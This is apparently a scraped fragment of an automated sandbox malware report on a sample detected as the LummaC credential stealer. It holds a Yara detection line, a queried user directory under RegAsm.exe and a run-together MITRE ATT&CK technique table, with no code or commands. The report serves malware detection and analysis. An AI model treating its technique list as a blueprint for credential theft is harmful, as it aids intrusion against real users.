                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior

                    Remote Access Functionality

                    barindex
                    Yara detected LummaC Stealer
                    Source: Yara matchFile source: sslproxydump.pcap, type: PCAP

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire Infrastructure1
                    Valid Accounts                    		12
                    Windows Management Instrumentation                    		1
                    DLL Side-Loading                    		1
                    DLL Side-Loading                    		1
                    Disable or Modify Tools                    		1
                    OS Credential Dumping                    		1
                    System Time Discovery                    		Remote Services12
                    Archive Collected Data                    		1
                    Ingress Tool Transfer                    		Exfiltration Over Other Network Medium11
                    Data Encrypted for Impact
                    CredentialsDomainsDefault Accounts1
                    Native API                    		1
                    Create Account                    		1
                    Valid Accounts                    		11
                    Obfuscated Files or Information                    		LSASS Memory1
                    Account Discovery                    		Remote Desktop Protocol31
                    Data from Local System                    		21
                    Encrypted Channel                    		Exfiltration Over Bluetooth1
                    System Shutdown/Reboot
                    Email AddressesDNS ServerDomain Accounts2
                    Command and Scripting Interpreter                    		1
                    Valid Accounts                    		11
                    Access Token Manipulation                    		1
                    Software Packing                    		Security Account Manager11
                    File and Directory Discovery                    		SMB/Windows Admin Shares1
                    Screen Capture                    		3
                    Non-Application Layer Protocol                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal Accounts1
                    Scheduled Task/Job                    		1
                    Scheduled Task/Job                    		11
                    Process Injection                    		1
                    DLL Side-Loading                    		NTDS23
                    System Information Discovery                    		Distributed Component Object ModelInput Capture114
                    Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchd1
                    Bootkit                    		1
                    Scheduled Task/Job                    		1
                    Valid Accounts                    		LSA Secrets321
                    Security Software Discovery                    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts22
                    Virtualization/Sandbox Evasion                    		Cached Domain Credentials22
                    Virtualization/Sandbox Evasion                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                    Access Token Manipulation                    		DCSync2
                    Process Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
                    Process Injection                    		Proc Filesystem1
                    System Owner/User Discovery                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                    Bootkit                    		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.